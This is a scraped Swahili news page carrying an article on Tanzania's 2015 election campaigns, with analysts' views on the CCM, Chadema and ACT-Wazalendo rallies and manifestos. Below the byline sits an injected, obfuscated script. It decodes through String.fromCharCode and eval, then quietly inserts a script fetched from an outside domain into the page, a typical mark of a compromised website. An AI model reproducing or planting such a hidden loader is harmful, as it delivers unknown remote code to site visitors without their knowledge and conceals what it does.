Recent Comments

Ni kampeni za kihistoria

By Baraka Bitariho Sep 4, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

12

KAMA umati wa watu wanaohudhuria mikutano ya kampeni ingekuwa ni kipimo pekee cha ushindi wa Uchaguzi Mkuu ujao, ingewawia vigumu hata watabiri mahiri duniani kujua nani angeibuka mshindi. Wiki moja baada ya kuzinduliwa kwa kampeni za uchaguzi mwaka huu, vyama vitatu vilivyozindua kampezni zake wiki jana, Chama Cha Mapinduzi (CCM), Chama Cha Demokrasia na Maendeleo (Chadema) na ACT – Wazalendo, vimeweza kuvutia wingi mkubwa wa watu katika mikutano yake ya kampeni. CCM na Chadema, walizindua kampeni zao katika Viwanja vya Jangwani jijini Dar es Salaam, vikikusanya umati mkubwa wa watu ambao kila chama kilikuwa kinanasibu kwamba ni umati wa rekodi, hakiwaji kuushuhudia katika mikutano yake, vivyo hivyo kwa chama kichanga cha ACT- Wazalendo kilichozindua kampeni zake katika Viwanja wa Zakhem, Mbagala. Mgombea wa CCM Dk. John Magufuli ambaye baada ya uzinduzi aliendea na kampeni zake katika Mikoa ya Katavi, Rukwa, Mbeya, Njombe na Ruvuma, kote amekuwa akipokewa na kuhutubia mikutano mikubwa ya watu waliokusnayika kwa maelfu kumsikiliza. “Kwa umati huu, hakuna namna CCM kitashindwa, hiki ni chama kikongwe kina mtandao mkubwa na kinaijua vyema historia ya Tanzania, wengine hawa wanapaka rangi upepo, ni lazima tushinde, kwa ushindi wa Tsunami,” anasema John James Mkazi wa Mbeya aliyehudhuria Mkutano wa kampeni wa Magufuli. Kwa upande wake mgombea Urais wa Chadema, Edward Lowassa, aliyeanzia kampeni zake mkoani Iringa baada ya uzinduzi, aliendeleza mapokezi ya mafuriko katika Mkoa huo huku wafuasi wake wakijiapiza ni lazima washinde. Mafuriko yanayotokea katika mikutano yake ndiyo yaliyomsukuma Lowassa kuwaleza wafuasi wake kwamba mwaka huu ni mwaka wa ushindi na kwamba wakishindwa kuingia Ikulu, itawachukua miaka 50 kuweza kuing’oa CCM madarakani. Wimbi la vigogo wa CCM kuhamia Ukawa wa siku za karibuni kabisa wakiongozwa na Waziri Mkuu msataafu Fredrick Sumaye limezipa changamoto tofauti kampeni za uchaguzi wa mwaka huu. Pamoja na kampeni za uchaguzi wa mwaka huu kuwa na hamasa, pengine kuliko wakati mwingine wowote katika historia ya Tanzania, bado zinaelezwa kutojikita katika masuala ya msingi. Wasomi wanaziona kampeni za Uchaguzi Mkuu wa mwaka huu kama zilizokosa maono zinazolenga masuala madogo zikiacha mikakati ya kulikwamua Taifa kiuchumi. Tayari vyama vya CCM, Chadema na ACT – Wazalendo kupitia kwa wagombea Dk. John Magufuli, Edward Lowassa na Anna Mgwira vimezindua kampeni zao na kuweka wazi ilani za uchaguzi wa vyama hivyo, lakini wachambuzi wa masuala ya siasa wanasema wagombea hao na vyama vyao wameonyesha upungufu mkubwa katika nia zao za kukabiliana na changamoto zinazolikabili Taifa kwa sasa. Mhadhiri wa Chuo Kikuu cha Dar es Salaam, Dk. Bashiru Ally amesema Chama cha Mapinduzi (CCM) na Chadema kupitia Umoja wa Katiba ya Wananchi (Ukawa) wamefanana katika jambo moja, wote wameonyesha uwezo wa kuvutia watazamaji katika mikutano yao. Anaongeza kwamba kama ilivyo katika biashara huria vyama hivi pia vinafanya siasa za kampeni huria kwa kuwanadi wagombea wao kama bidhaa zilizonakishiwa kwenye vifungashio vinavyovutia hata kama mbuto wa kifungashio hicho haulingani na ubora wa bidhaa inayonadiwa. “Huku kunadi wagombea kama bidhaa, kunavutia watu wengi lakini hakuongezi thamani katika demokrasia, badala ya kufanya kampeni vyama hivi ni kama vinafaya matamasha, hakuna usikivu makini kwenye mikutano yao, watu wanaokwenda kwenye mikutano ukiwaangalia wamejikita kwenye kuburudishwa na wanafurahia hicho badala ya kusikiliza sera,” alisema Dk. Bashiru na kuongeza. “Mahudhurio na vitendo vya watu wanaohudhuria matamasha (mikutano ya kampeni) hayo, sioni ulinganifu wake na umakini wa kusikiliza sera na kupima uwezo wa wagombea, wanatawaliwa na ushabiki na mapenzi zaidi, jambo ambalo si afya kidemokrasia, ” alisema. Katika hilo, alikitofautisha ACT – Wazalendo na mkumbo huo na kwamba wao wamefanya mkutano wenye usikivu na kuongelea masuala makini na muhimu kwa mustakabali wa taifa. Aonya kuhusu ukubwa wa “matamasha” Katika hatua nyingine Dk. Bashiru alitahadharisha kuhusu ukubwa wa mikutano na wingi wa watu usipojengewa uwezo wa kusikilizana na kuvumiliana kunaweza kuliletea taifa hili balaa kubwa. “Wingi wa watu kwenye matamasha haya ya kampeni, usipotafsiriwa kwa wingi wa idadi ya kura kwenye sanduku la kupigia kura, kwa kwa mfumo tabia ya vyama hivi kutoa matamko kama tutashinda kwa gharama zozote, unaweza kuzua taharuki na kuiweka nchi katika hali ya hatari,” alisema. Hoja muhimu za taifa Kuhusu uwezo wa upinzani kuwa mbadala wa CCM, alisema pamoja na vyenyewe kudai kwamba ni vyama mbadala kwa CCM, lakini vimeshindwa kuonyesha uwezo wa kuwa mbadala wa nafasi hiyo kwa sababu kwa kiasi kikubwa wamekuwa kama chama hicho. “Chama mbadala lazima kiwe na dira, mikakati, malengo na ubunifu wa kusahihisha makosa ya CCM, vyenyewe navyo vikishindwa kuonyesha uwezo huo, vinakosa haki ya kuwa mbadala,” alisema. Akizungumzia Chadema na mgombea wao, anayeungwa mkono na Ukawa, Edward Lowassa, Dk. Bashiru alisema, wameonyesha udhaifu wakati wa uzinduzi wa kampeni zao na moja hilo ni kati ya masuala wanayotakiwa kuyafanyia kazi kazi muda huu uliobaki. “Kitendo cha mgombea wa Ukawa kuwaeleza wananchi kwamba wakasome Ilani ya chama chake kwenye mtandao, ni kosa kubwa kimkakati, wasipoangalia watashindwa, wataanguka kifo cha mende. CCM kinatetea hoja mgombea wao ameweka wazi kwamba ufisadi ni jambo linalomkera na ataanzisha mahakama maalumu ya kulishughulikia. Ukawa wanajitetea hawajajiandaa kushindana kwa hoja,” alisema Dk. Bashiru. “Ni lazima washindane kwa hoja, waseme watafanya nini kuondoa pengo kati ya masikini na matajiri, mgombea wa Ukawa amefanya kwa kiwango cha chini sana siku ya kwanza ya kampeni, hizi wiki zilizobaki lazima wafanye kazi kubwa kurekebisha hilo,” alisema. Alisema wananchi wana maswali yao mengi ambayo yatakiwa yajibiwe na wagombea katika kujieleza namna gani wanaweza kuliendesha taifa letu. Alisema watu wanahoji kuhusu Muungano, ajira na masuala mengi ya msingi. “Huwezi kuwa kiongozi wa serikali ukasema Bodaboda ni rafiki zako, utawasaidia, uwepo wa Bodaboda ni kielelezi cha ukosefu wa ajira. Wagombea wakitaka kutatua ajira hawa wote wapelekwe kuzalisha kwenye viwanda na kwenye kilimo, iwawezeshe mama lishe nguvukazi hiyo iende kuzalisha kweli kilimo,” alisema. Alisema mgombea wa ACT Wazalendo Mghwira ameonyesha uwezo mkubwa wa kujieleza lakini akaeleza pia masuala ya msingi kwa Taifa. “Amejieleza vizuri na masuala aliyoyaeleza ni muhimu, kaulimbiu yao ya utu, uzalendo na uadilifu ni tunu muhimu sana kuwa nazo, ameonyesha kujadili mambo ambayo kama yakitekelezwa yatarejesha misingi muhimu kwa Taifa,” alisema. Aidha, alionya kuhusu uzushi unaoendela sasa nchini kuhusu masuala mbalimbali ya vyama na wagombea, aliwataka wananchi kujiepusha na uzushi huo kwa kuwa jambo hilo linaweza kusababisha mlipuko katika bila sababu. Akizungumzia uzinduzi wa kampeni hizo kwa vyama hivyo, aliyekuwa Makamu Mkuu wa Chuo cha Mtakatifu Augustiono (SAUT), Dk. Charles Kitima alisema pamoja na maandalizi ya mazuri ya mikutano ya kampeni na kurushwa moja kwa moja na vyombo vya habari, ili kuwawezesha wananchi wengi kufuatilia, lakini kulikuwa na tatizo la wagombea kunyimwa muda wa kujieleza kwa kuwa wazungumzaji walikuwa wengi lakini pia akakosoa ilani za vyama hivyo. “Ilani za vyama vyote ukizisoma ukiandoa kutoa ahadi hazielezi ni kwa namna gani, kwa mfano, zitahusianishwa na Dira ya Taifa ya kulifanya Taifa liwe la kipato cha kati. Kwa hilo wote wameshindwa kuonyesha. “Wote pia wamezungumzia ajira kwa vile tu ni tatizo, wanasema viwanda hawasemi ni viwanda vya aina gani, wapi vitajengwa na masoko ya bidhaa za viwanda hivyo yako wapi, hatuonyeshwi mikakati yeyote, haionyeshi kama wamefanya utafiti wowote. “Changamoto kubwa waliyo nayo huko mikoani waliko watuthibitishie katika ajira wataleta vipi na viwanda vitapatikana vipi,” alisema Dk. Kitima. Dk. Kitima alishangaa jinsi wagombea wanavyozungumzia elimu, wakisema wataboresha elimu lakini wanaonyesha hawajui matatizo halisi ya waalimu. “Kuna shule nyingi za sekondari zimeanzishwa lakini hawasemi wanawezaje kuanzisha sekondari za juu za kidato cha tano a sita katika maeneo hayo. Wanaahidi elimu ya bure, hii ya sasa yenyewe ina changamoto nyingi, ukileta elimu ya bure ambayo haina ubora haiwezi kulisaidia Taifa wala Watanzania,” alisema. Aidha Dk. Kitima alisema wagombea wote wanaonyesha hawana picha pana ya uchumi na akaonya kuwa kujivunia gesi na mafuta si suluhisho kwani kuna nchi kama Nigeria ambazo pamoja na utajiri huo wa bado wanachi wake wako katika lindi la umasikini. Kuhusu haki za binadamu Mkurugenzi wa Kituo cha Sheria na Haki za Binadamu, Helen Kijo Bisimba ameliambia Raia Mwema kuwa vyama vyote vimezungumzia haki za binadamu kwa njia ya huduma jambo ambalo hadhani kama ni sahihi ukiliganisha na kiwango cha ukiukwaji wa haki za binadamii nchini. “Ilani za vyama wametaja haki kama huduma, lakini kwa ukubwa wa matatizo ya ukiukwaji wa haki za binadamu nchini, ingepaswa kuwe na ibara kamili kwenye ilani ili kuonyesha watazilinda vipi haki hizo, na wananchi waweze kuzidia kama zikinyimwa,” alisema. Alisema kuwa ACT Wazalendo na Chadema walau wameonyesha kwamba wanaweza kuirejesha Rasimu ya pili ya Katiba, kama itarejeshwa rasimu hiyo, haki nyingi zilizotajwa kwenye rasimu hiyo, zitairejesha haki ambazo zimetajwa katika makubaliano mbalimbali ya kimataifa. Babu Seya na watuhumiwa wa Ugaidi Akizungumzia ahadi ya Lowassa kuwamchia huru Babu Seya na watuhumiwa wa kesi ya ugaidi, Bisimba alionya; “Matamko haya hayapaswi kutolewa. Yanatishia uhuru wa Mahakama, katika utawala wa sheria kuna haki na wajibu. Rais hahusiki kabisa na mambo ya sheria au kufungulia wafungwa labda kupitia kwa msamaha, na msamaha huo hauhusishi aina ya makosa yanayomhusu Babu Seya. “Ile kesi ilifika Mahakama ya Rufaa, kama kuna watu hawakuridhika waende kukata rufaa Mahakama ya Afrika ya Haki za Binadamu.” Alisema.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com